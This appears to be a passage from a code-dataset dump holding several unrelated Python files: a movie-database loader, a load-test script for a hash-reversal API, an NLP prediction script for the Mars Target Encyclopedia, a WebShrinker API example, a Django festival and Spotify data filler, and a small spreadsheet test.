create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nimport pandas as pd\r\nimport json\r\nimport re\r\nimport numpy as np\r\n\r\n\r\nBase = declarative_base()\r\n\r\nclass Movie(Base):\r\n    __tablename__='Movie'\r\n    Id=Column(Integer,primary_key=True,autoincrement=False)\r\n    original_title=Column(String(200))\r\n    poster_path=Column(String(200))\r\n    def __init__(self,Id,original_title,poster_path):\r\n        self.Id=Id\r\n        self.original_title=original_title\r\n        self.poster_path=poster_path\r\n    def __repr__(self):\r\n        return self.original_title\r\n\r\nclass MovieTags(Base):\r\n    __tablename__='Tags'\r\n    Id=Column(Integer,primary_key=True,autoincrement=False)\r\n    tags=Column(String(5000))\r\n    def __init__(self,Id,tags):\r\n        self.Id=Id\r\n        self.tags=tags\r\n\r\nclass Index(Base):\r\n    __tablename__='Index_table'\r\n    Numb=Column(Integer,primary_key=True,autoincrement=True)\r\n    Id=Column(Integer)\r\n    def __init__(self,Id):\r\n        self.Id=Id\r\n    def __repr__(self):\r\n        return str(self.Numb) + ' ' + str(self.Id)\r\n\r\nengine = create_engine('sqlite:///movie_recommendations.db')\r\nBase.metadata.create_all(engine)\r\nsession = sessionmaker()\r\nsession.configure(bind=engine)\r\ns = session()\r\n\r\nmovies=s.query(Movie).all()\r\nfor i in movies:\r\n    index=Index(i.Id)\r\n    s.add(index)\r\ns.commit()\r\n\r\n\r\n# df4=pd.read_csv('final.csv')\r\n# for index,row in df4.iterrows():\r\n#     if pd.isnull(row['id']) or pd.isnull(row['poster_path']) or pd.isnull(row['original_title']) or (pd.isnull(row['genres']) and pd.isnull(row['keywords']) and pd.isnull(row['crew'])):\r\n#         continue\r\n#     movie=Movie(row['id'],row['original_title'],row['poster_path'])\r\n#     tags=\"\"\r\n#     if pd.isnull(row['genres'])!=True:\r\n#         tags+=row['genres']\r\n#     if pd.isnull(row['crew'])!=True:\r\n#         tags+=row['crew']\r\n#     if pd.isnull(row['keywords'])!=True:\r\n#         tags+=row['keywords']\r\n#     movie_tag=MovieTags(row['id'],tags)\r\n#     if s.query(Movie).get(row['id']) is None:\r\n#         s.add(movie)\r\n#     if s.query(MovieTags).get(row['id']) is None:\r\n#         s.add(movie_tag)\r\n#     print(index)\r\n# 
s.commit()\r\n\r\n#df1=pd.read_csv('movies_metadata_processed.csv',dtype={\"id\": \"string\", \"genres\":\"string\",\"orignal_title\": \"string\", \"poster_path\":\"string\"},usecols=[\"id\",\"genres\",\"original_title\",\"poster_path\"])\r\n#df2=pd.read_csv('keywords_processed.csv',dtype={\"id\":\"string\",\"keywords\":\"string\"})\r\n\r\n#for index,row in df2.iterrows():\r\n# if pd.isnull(row['keywords'])!=True:\r\n# x=(row['keywords']).replace(\"\\\"\",\"\")\r\n# df2.at[index,'keywords']=x\r\n\r\n#df2.to_csv('keywords_processed.csv',index=False,na_rep='N/A')\r\n\r\n#df3=pd.read_csv('credits_processed.csv',dtype={\"id\":\"string\",\"crew\":\"string\"},usecols=[\"id\",\"crew\"])\r\n# for index,row in df3.iterrows():\r\n# x=re.search(\"'Director', 'name': '[a-z A-Z 0-9]*'\",row['crew'])\r\n# if x is None:\r\n# df3.at[index,'crew']=None \r\n# else:\r\n# x=x[0]\r\n# x=x.replace(',','').replace(\"\\\"\",'').replace('\\'','').replace('Director','').replace('name','').replace(':','')\r\n# x=re.sub(' +',' ',x)\r\n# df3.at[index,'crew']=x\r\n# print(x)\r\n# df3.to_csv('credits_processed.csv',index=False,na_rep='N/A')\r\n\r\n# x=(df1['genres'].tolist()[0]).replace(\"\\'name\\'\",\"\").replace(\"\\'id\\'\",\"\").replace(\"[\",\"\").replace(\"]\",\"\").replace(\"{\",\"\").replace(\"}\",\"\").replace(\":\",\"\").replace(\",\",\"\").replace(\"\\'\",\"\")\r\n# x=re.sub('[0-9]','',x)\r\n# x=re.sub(' +',' ',x)\r\n\r\n# for index,row in df1.iterrows():\r\n# x=(row['genres']).replace(\"\\'name\\'\",\"\").replace(\"\\'id\\'\",\"\").replace(\"[\",\"\").replace(\"]\",\"\").replace(\"{\",\"\").replace(\"}\",\"\").replace(\":\",\"\").replace(\",\",\"\").replace(\"\\'\",\"\")\r\n# x=re.sub('[0-9]','',x)\r\n# x=re.sub(' +',' ',x)\r\n# df1.at[index,'genres']=x\r\n# print(x)\r\n\r\n# df1.to_csv('movies_metadata_processed.csv',index=False,na_rep='N/A')\r\n# for i in x:\r\n# print(i)\r\n\r\n\r\n\r\n# (pd.concat([df1, df2, df3], axis=1,join='inner')\r\n# .to_csv('final.csv', index=False, na_rep='N/A')\r\n# )\r\n\r\n\r\n\r\n \r\n\r\n\r\n ", "sub_path": "insert.py", "file_name": "insert.py", "file_ext": "py", "file_size_in_byte": 4168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 27, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 35, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 36, "usage_type": "argument"}, {"api_name": "sqlalchemy.create_engine", "line_number": 42, "usage_type": "call"}, {"api_name": 
"sqlalchemy.orm.sessionmaker", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "87768383", "text": "import requests\nfrom multiprocessing import Pool, TimeoutError\nfrom string import printable\nimport random\nimport hashlib \nimport argparse\ncount = 1000\ndone = 0\n\nparser = argparse.ArgumentParser(description='Config the script.')\n\n\nparser.add_argument('--address', type=str, help='address to query')\nparser.add_argument('--count', type=int, help='how many hashes to break')\nparser.add_argument('--concurrency', type=int, help='how concurrently the API should be called')\nargs = parser.parse_args()\n\n\ndef invoke(val):\n global done\n done+=1\n string = ''.join(random.choices(printable, k=3))\n hsh = hashlib.md5(string.encode()).hexdigest()\n print(\"sent\" + args.address + \"/?hash=\" + hsh + \"?&start=\" + str(0) + \"&end=\" + str(1000000))\n val = requests.get(args.address + \"/?hash=\" + hsh + \"&start=\" + str(0) + \"&end=\" + str(1000000))\n print(\"processed\" + args.address + \"/?hash=\" + hsh + \"?&start=\" + str(0) + \"&end=\" + str(1000000))\n return val.text\n\n\nwith Pool(processes=args.concurrency) as pool:\n results = pool.map(invoke, range(args.count))\n print(results)\n", "sub_path": "compute.py", "file_name": "compute.py", "file_ext": "py", "file_size_in_byte": 1089, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 22, "usage_type": "call"}, {"api_name": "string.printable", "line_number": 22, "usage_type": "argument"}, {"api_name": "hashlib.md5", "line_number": 23, "usage_type": "call"}, {"api_name": "string.encode", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "168766357", "text": "# python3\n# predict.py\n# Mars Target Encyclopedia\n# This script uses a trained Containee model to predict if a component instance is a Containee instance. 
\n#\n# Yuan Zhuang\n# July 30, 2021\n# Copyright notice at bottom of file.\n\nimport os, sys, argparse, torch, pickle, random, json, numpy as np\nfrom transformers import *\nfrom torch.utils.data import DataLoader\nfrom os.path import abspath, dirname, join, exists\nfrom sys import stdout\nimport numpy as np\nfrom copy import deepcopy\nfrom dataset import MyDataset, collate\nfrom model import Model\n\n# label info \ncurpath = dirname(abspath(__file__))\nupperpath = dirname(curpath)\nsys.path.append(upperpath)\n\nfrom eval import unary_eval\n\nfrom config import label2ind, ind2label,tokenizer_type\n\nexppath = dirname(dirname(dirname(curpath)))\nshared_path = join(dirname(dirname(upperpath)), 'shared')\nsys.path.insert(0, shared_path)\nfrom other_utils import add_marker_tokens\n\ntokenizer = BertTokenizerFast.from_pretrained(tokenizer_type)\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nfrom tabulate import tabulate \n\ndef analyze(pred_instances, val_gold_ins, dev_analysis_outdir):\n\n    if not exists(dev_analysis_outdir):\n        os.makedirs(dev_analysis_outdir)\n    \n    print(f\"saving analysis to {dev_analysis_outdir}: error.txt and correct.txt\")\n\n    with open(join(dev_analysis_outdir, \"error.txt\"), \"w\") as f:\n        for ins in sorted(pred_instances, key = lambda x: (x.doc_id, x.sentid)):\n            if ins.relation_label != ins.pred_relation_label:\n                f.write(f\"DOC: {ins.doc_id}\\nSENT: {' '.join(ins.sent_toks)}\\nTEXT: {ins.text}\\nINPUTIDS: {' '.join(tokenizer.convert_ids_to_tokens(ins.input_ids))}\\nHEAD:{tokenizer.convert_ids_to_tokens(ins.input_ids)[ins.bert_start_idx]}\\nPRED: {ins.pred_relation_label}, LABEL: {ins.relation_label}\\nSCORE: {[f'{s*100:.2f}' for s in ins.pred_score]}\\n\\n\")\n\n    with open(join(dev_analysis_outdir, \"correct.txt\"), \"w\") as f:\n        for ins in sorted(pred_instances, key = lambda x: (x.doc_id, x.sentid)):\n            if ins.relation_label == ins.pred_relation_label and ins.pred_relation_label != \"O\":\n                f.write(f\"DOC: {ins.doc_id}\\nSENT: {' '.join(ins.sent_toks)}\\nTEXT: {ins.text}\\nPRED: {ins.pred_relation_label}, LABEL: {ins.relation_label}\\n\\n\")\n\ndef eval_and_save(model, val_dataloader, val_gold_ins, best_f1, args, label_to_eval = \"Contains\", tuple_level = False, save_prediction = False, use_all_yes = 0): \n\n    \"\"\"\n    Evaluate a trained model over the validation set and save it if it achieves better performance \n\n    Args:\n        model: \n            a trained model \n        val_dataloader:\n            a dataloader that contains extracted instances from validation files to predict \n        val_gold_ins:\n            a list of gold instances from validation files\n        best_f1:\n            previous best F1 score \n        args:\n            argument instance \n        label_to_eval:\n            type of relation to extract (e.g. Contains)\n        tuple_level:\n            a boolean to indicate whether the evaluation is tuple-level or instance-level \n        save_prediction:\n            a boolean to indicate whether to save predictions \n        use_all_yes:\n            a boolean to indicate whether to assign Contains to all extracted instances. This is the all-yes baseline. 
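\n\n    Example (an illustrative sketch, not part of the original script; the surrounding training loop is assumed):\n        best_f1 = eval_and_save(model, val_dataloader, val_gold_ins, best_f1, args, tuple_level=False, save_prediction=True)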
\n\n \"\"\"\n\n print(\"\\n\\n---------------eval------------------\\n\")\n pred_instances = predict(model, val_dataloader)\n\n if use_all_yes:\n for ins in pred_instances:\n ins.pred_relation_label = 'Contains'\n\n precision, recall, f1 = unary_eval(pred_instances, val_gold_ins, label_to_eval, tuple_level = tuple_level)\n\n score_str = f\"precision: {precision*100:.2f}, recall: {recall*100:.2f}, f1: {f1*100:.2f}\\n\"\n\n print(f\"------------- Evaluation ------------\\n\\n{score_str}\\n\")\n\n if args.analyze_dev:\n analayze(pred_instances, val_gold_ins, args.outdir)\n\n if save_prediction:\n if not exists(args.outdir):\n os.makedirs(args.outdir)\n\n print(f\"saving prediction to {join(args.outdir, f'components.pred')}\")\n with open(join(args.outdir, f\"components.pred\"), \"wb\") as f:\n pickle.dump(pred_instances, f)\n \n\n return best_f1\n\n\n\ndef predict(model, dataloader):\n \"\"\"\n This function uses a trained Containee model to predict whether a component is a Containee instance. \n\n Args:\n model: \n a trained model \n dataloader:\n a dataloader that contains component instances to predict labels for \n \"\"\"\n\n model = model.to(device)\n model.eval()\n \n pred_instances = []\n soft = torch.nn.Softmax(dim = 1)\n\n # ids is for tracking \n with torch.no_grad(): \n for i, item in enumerate(dataloader):\n \n stdout.write(f\"\\rpredicting {i}/{len(dataloader)}\")\n stdout.flush()\n\n logits =model.forward(item)\n scores = soft(logits).cpu().numpy()\n y_preds = np.argmax(scores,1)\n\n\n for ins, y_pred, score in zip(item[\"instances\"], y_preds, scores):\n if score[0] > 0.5:\n y_pred = 0\n else:\n y_pred = 1\n ins.pred_relation_label = ind2label[y_pred]\n ins.pred_score = score\n pred_instances.append(ins)\n\n return pred_instances\n\nif __name__ == \"__main__\":\n\n\n \"\"\" ================= parse =============== \"\"\"\n parser = argparse.ArgumentParser()\n \n parser.add_argument('-use_all_yes', default = 0, type = int, choices = [0,1], help = \"whether to run the all yes baseline, which assigns Contains to all instances\")\n\n parser.add_argument(\"--modelfile\", required = True, help = 'trained model file')\n parser.add_argument(\"--test_dir\", required = True, help = 'directory where testing instances are stored')\n parser.add_argument(\"--outdir\", default = \"./temp/prediction\", help = \"where to save the model to\")\n parser.add_argument(\"--dropout\", type = float, default = 0)\n parser.add_argument(\"--analyze_dev\", default = 0, choices = [0, 1], type = int, help = 'whether to do analysis of the model predictions')\n\n args = parser.parse_args()\n\n ners = ['Component']\n\n add_marker_tokens(tokenizer, ners)\n\n print(\"Loading data \")\n test_file = join(args.test_dir, \n \"spanins.pkl\")\n\n with open(test_file, \"rb\") as f:\n test_ins = pickle.load(f)\n\n with open(join(args.test_dir, \"gold_spanins.pkl\"), \"rb\") as f:\n test_gold_ins = pickle.load(f)\n\n \"\"\" ================ make dataset ================ \"\"\"\n print(\"Making dataset ... 
\")\n test_dataset = MyDataset(test_ins)\n\n \"\"\" ================ make dataloader ============= \"\"\"\n print(\"Making data loader ...\")\n test_dataloader = DataLoader(test_dataset, batch_size = 10, collate_fn = collate)\n \"\"\" ================ model ================ \"\"\"\n\n model = Model(tokenizer,args)\n model.load_state_dict(torch.load(args.modelfile))\n\n print(\"Instance Level Evaluation: \")\n eval_and_save(model, test_dataloader, test_gold_ins, None, args, tuple_level = False, save_prediction = False)\n \n print(\"Tuple Level Evaluation:\")\n eval_and_save(model, test_dataloader, test_gold_ins, None, args, tuple_level = True, save_prediction = True)\n \n if args.use_all_yes:\n print(\"All yes baseline\")\n print(\"Tuple Level: \")\n eval_and_save(model, test_dataloader, test_gold_ins, None, args, tuple_level = True, save_prediction = False, use_all_yes = True)\n print(\"Instance Level:\")\n eval_and_save(model, test_dataloader, test_gold_ins, None, args, tuple_level = False, save_prediction = False, use_all_yes = True)\n\n# Copyright 2021, by the California Institute of Technology. ALL\n# RIGHTS RESERVED. United States Government Sponsorship\n# acknowledged. Any commercial use must be negotiated with the Office\n# of Technology Transfer at the California Institute of Technology.\n#\n# This software may be subject to U.S. export control laws and\n# regulations. By accepting this document, the user agrees to comply\n# with all applicable U.S. export laws and regulations. User has the\n# responsibility to obtain export licenses, or other export authority\n# as may be required before exporting such information to foreign\n# countries or providing access to foreign persons.\n\n\n\n ", "sub_path": "experiments/within-sentence-experiments/unary_classifiers/containee/predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 8374, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "config.tokenizer_type", "line_number": 34, "usage_type": "argument"}, {"api_name": "torch.device", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "eval.unary_eval", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 101, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 102, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 106, "usage_type": "call"}, {"api_name": "model.to", "line_number": 124, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 131, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 134, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 134, "usage_type": "name"}, {"api_name": "sys.stdout.flush", "line_number": 135, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 135, "usage_type": "name"}, {"api_name": "model.forward", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 139, "usage_type": "call"}, {"api_name": "config.ind2label", "line_number": 147, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 157, "usage_type": "call"}, {"api_name": "other_utils.add_marker_tokens", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 174, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 181, "usage_type": "call"}, {"api_name": "dataset.MyDataset", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 189, "usage_type": "call"}, {"api_name": "dataset.collate", "line_number": 189, "usage_type": "name"}, {"api_name": "model.Model", "line_number": 192, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "52851579", "text": "##########################################################################################\n# NOTE: If you are using Python 2.7.6 you might run into an issue\n# with making API calls using the requests library.\n# For a workaround, see:\n# http://stackoverflow.com/questions/31649390/python-requests-ssl-handshake-failure\n##########################################################################################\n\nimport requests\nimport json\nfrom base64 import urlsafe_b64encode\n\ntry:\n from urllib import urlencode\nexcept ImportError:\n from urllib.parse import urlencode\n\ntarget_website = b\"\"\n\nkey = \"\"\nsecret_key = \"\"\n\nparams = {\n \"limit\": 10\n}\n\napi_url = \"https://api.webshrinker.com/hosts/v3/{}/links/inbound?{}\".format(urlsafe_b64encode(target_website).decode('utf-8'), urlencode(params, True))\n\nresponse = requests.get(api_url, auth=(key, secret_key))\nstatus_code = response.status_code\ndata = response.json()\n\nif status_code == 200:\n # Do something with the JSON response\n print(json.dumps(data, indent=4))\nelif status_code == 400:\n # Bad or malformed HTTP request\n print(\"Bad or malformed HTTP request\")\n print(data)\nelif status_code == 401:\n # Unauthorized\n print(\"Unauthorized - check your access and secret key permissions\")\n print(data)\nelif status_code == 402:\n # Request limit reached\n print(\"Account request limit reached\")\n print(data)\nelse:\n # General error occurred\n print(\"A general error occurred, try the request again\")\n", 
"sub_path": "hosts/python/backlinks_or_outbound_links_using_requests.py", "file_name": "backlinks_or_outbound_links_using_requests.py", "file_ext": "py", "file_size_in_byte": 1601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 26, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "61486495", "text": "import os\nimport django\nimport django.db.utils\nfrom django.core.exceptions import ObjectDoesNotExist\nimport spotipy\n# django project has to be set before importing from the project's apps\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"LearnTheLineup.settings\")\ndjango.setup()\nfrom festivals.models import Festival, Day\nfrom artists.models import Artist, Song\n\n\ndef readFromText():\n \"\"\"Reads from text files containing festival lineups and adds festivals and objects to the database.\"\"\"\n festNames = [\n \"Coachella 2018\",\n ]\n for festName in festNames:\n try:\n filename = \"festivals/static/festivals/\" + festName + \".txt\"\n file = open(filename, mode='r')\n fest = Festival(name=festName)\n fest.save()\n\n dayCount = 1\n firstDay = Day(day=dayCount, festName=festName)\n firstDay.save()\n fest.allArtists.add(firstDay)\n fest.save()\n coachellaOrder = 0\n\n while True:\n line = file.readline()\n if not line: # EOF\n break\n line = line.strip()\n if not line: # blank line indicates separate day\n dayCount += 1\n nextDay = Day(day=dayCount, festName=festName)\n nextDay.save()\n fest.allArtists.add(nextDay)\n fest.length = fest.length + 1\n fest.save()\n coachellaOrder = 0\n\n else:\n coachellaOrder += 1\n try:\n a = Artist(name=line)\n a.coachellaOrder = coachellaOrder\n a.save()\n fest.addArtist(a, dayCount)\n fest.save()\n print(a, end=\"\")\n print(\" added to \" + festName + \" day \" + str(dayCount))\n\n except django.db.utils.IntegrityError: # Artist already in database\n print(\"Duplicate artist \", end=\"\")\n try:\n result = Artist.objects.get(name=line)\n fest.addArtist(result, dayCount)\n fest.save()\n result.coachellaOrder = coachellaOrder\n print(result.name + \" added to \" + festName + \" day \" + str(dayCount))\n except ObjectDoesNotExist:\n print(line + \" could not be located\")\n file.close()\n\n except django.db.utils.IntegrityError:\n print(festName + \" already exists, skipping file\")\n except FileNotFoundError:\n print(\"festivals/static/festivals/\" + festName + \".txt not found\")\n\n\ndef searchArtistName():\n \"\"\"Looks up each artist in the database through Spotify's Web API. If the artist is found on Spotify, the artist's\n Spotify URI attribute is set.\"\"\"\n artists = Artist.objects.all()\n for artist in artists:\n artist.findSpotifyURI()\n artist.save()\n if artist.spotifyURI:\n print(artist, end=\"\")\n print(\" uri found: \", end=\"\")\n print(artist.spotifyURI)\n else:\n print(\"URI not found for \", end=\"\")\n print(artist)\n\n\ndef searchArtistAlbum():\n \"\"\"Looks up artist albums for each artist in the database that has a Spotify URI. 
If albums are found, the\n artist's most recent album URI is set.\"\"\"\n artists = Artist.objects.all()\n for artist in artists:\n try:\n artist.findRecentAlbum()\n artist.save()\n except spotipy.client.SpotifyException:\n print(\"Too many albums under \", end=\"\")\n print(artist)\n\n if artist.recentAlbum:\n print(artist, end=\"\")\n print(\" album uri found: \", end=\"\")\n print(artist.recentAlbum)\n else:\n print(\"No album uri found for \", end=\"\")\n print(artist)\n\n\ndef searchSongs():\n \"\"\"Looks up the most popular songs for each artist in the database that has a Spotify URI (10 songs max). If songs\n are found, their URIs are added to the artist's top songs attribute.\"\"\"\n artists = Artist.objects.all()\n for artist in artists:\n artist.findSongs()\n artist.save()\n if artist.topSongs.all():\n print(str(artist) + \" top \" + str(len(artist.topSongs.all())) + \" song uris found\")\n else:\n print(\"No top song uri found for\", artist)\n if artist.setlistSongs.all():\n print(str(artist) + \" \" + str(len(artist.setlistSongs.all())) + \" setlist song uris found\")\n else:\n print(\"No recent setlist found for\", artist)\n\n if artist.recentAlbumSongs.all():\n print(str(artist) + \" \" + str(len(artist.recentAlbumSongs.all())) + \" recent album song uris found\")\n else:\n print(\"No recent album uri found for\", artist)\n\n\ndef searchGenres():\n \"\"\"Looks up genres for each artist in the database that has a Spotify URI. If genres are found, their names are\n added to the artist's genres attribute.\"\"\"\n artists = Artist.objects.all()\n for artist in artists:\n artist.findGenres()\n artist.findImage()\n artist.save()\n if artist.genres.all():\n print(artist, end=\" \")\n print(\"found \" + str(len(artist.genres.all())) + \" genres\")\n else:\n print(\"No genre found for\", artist)\n if artist.imageURL != \"\":\n print(\"Image found for\", artist)\n else:\n print(\"No image found for\", artist)\n\ndef deleteDuplicates():\n for row in Song.objects.all():\n if Song.objects.filter(uri=row.uri).count() > 1:\n print(\"Deleted \" + row)\n row.delete()\n\n\n# readFromText()\n# searchArtistName()\n# searchArtistAlbum()\n# searchSongs()\n# searchGenres()\n\n\n# artists = Artist.objects.all()\n# for artist in artists:\n# artist.findImage()\n# artist.findGenres()\n# artist.findRecentAlbum()\n# artist.findSongs()\n# artist.save()", "sub_path": "datafill.py", "file_name": "datafill.py", "file_ext": "py", "file_size_in_byte": 6146, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ.setdefault", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.setup", "line_number": 8, "usage_type": "call"}, {"api_name": "festivals.models.Festival", "line_number": 22, "usage_type": "call"}, {"api_name": "festivals.models.Day", "line_number": 26, "usage_type": "call"}, {"api_name": "festivals.models.Day", "line_number": 39, "usage_type": "call"}, {"api_name": "artists.models.Artist", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db", "line_number": 57, "usage_type": "attribute"}, {"api_name": "artists.models.Artist.objects.get", "line_number": 60, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 60, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 65, 
"usage_type": "name"}, {"api_name": "django.db", "line_number": 69, "usage_type": "attribute"}, {"api_name": "artists.models", "line_number": 78, "usage_type": "name"}, {"api_name": "artists.models.Artist.objects.all", "line_number": 78, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 78, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 79, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 94, "usage_type": "name"}, {"api_name": "artists.models.Artist.objects.all", "line_number": 94, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 94, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 95, "usage_type": "name"}, {"api_name": "spotipy.client", "line_number": 99, "usage_type": "attribute"}, {"api_name": "artists.models", "line_number": 115, "usage_type": "name"}, {"api_name": "artists.models.Artist.objects.all", "line_number": 115, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 115, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 115, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 116, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 137, "usage_type": "name"}, {"api_name": "artists.models.Artist.objects.all", "line_number": 137, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 137, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 137, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 138, "usage_type": "name"}, {"api_name": "artists.models.Song.objects.all", "line_number": 153, "usage_type": "call"}, {"api_name": "artists.models.Song.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "artists.models.Song", "line_number": 153, "usage_type": "name"}, {"api_name": "artists.models.Song.objects.filter", "line_number": 154, "usage_type": "call"}, {"api_name": "artists.models.Song.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "artists.models.Song", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "591046061", "text": "import xlwt\n\nbook = xlwt.Workbook(encoding=\"utf-8\",style_compression=0)\n\nsheet = book.add_sheet(\"Sheet1\", cell_overwrite_ok=True)\n\ndata1 = 'beijing'\nsheet.write(1,0,data1)\n\nbook.save('test\\\\test_write.xlsx')", "sub_path": "test/test_write.py", "file_name": "test_write.py", "file_ext": "py", "file_size_in_byte": 207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "xlwt.Workbook", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "540280302", "text": "from __future__ import annotations\n\nfrom dataclasses import dataclass, field\nfrom enum import Enum\nfrom typing import List, Optional\n\nfrom cloudrail.knowledge.context.aws.resources.aws_client import AwsClient\nfrom cloudrail.knowledge.context.aws.resources.ec2.ec2_image import Ec2Image\nfrom cloudrail.knowledge.context.aws.resources.networking_config.network_entity import NetworkEntity\nfrom cloudrail.knowledge.context.aws.resources.networking_config.network_resource import NetworkResource\nfrom cloudrail.knowledge.context.aws.resources.service_name import AwsServiceName, AwsServiceAttributes, 
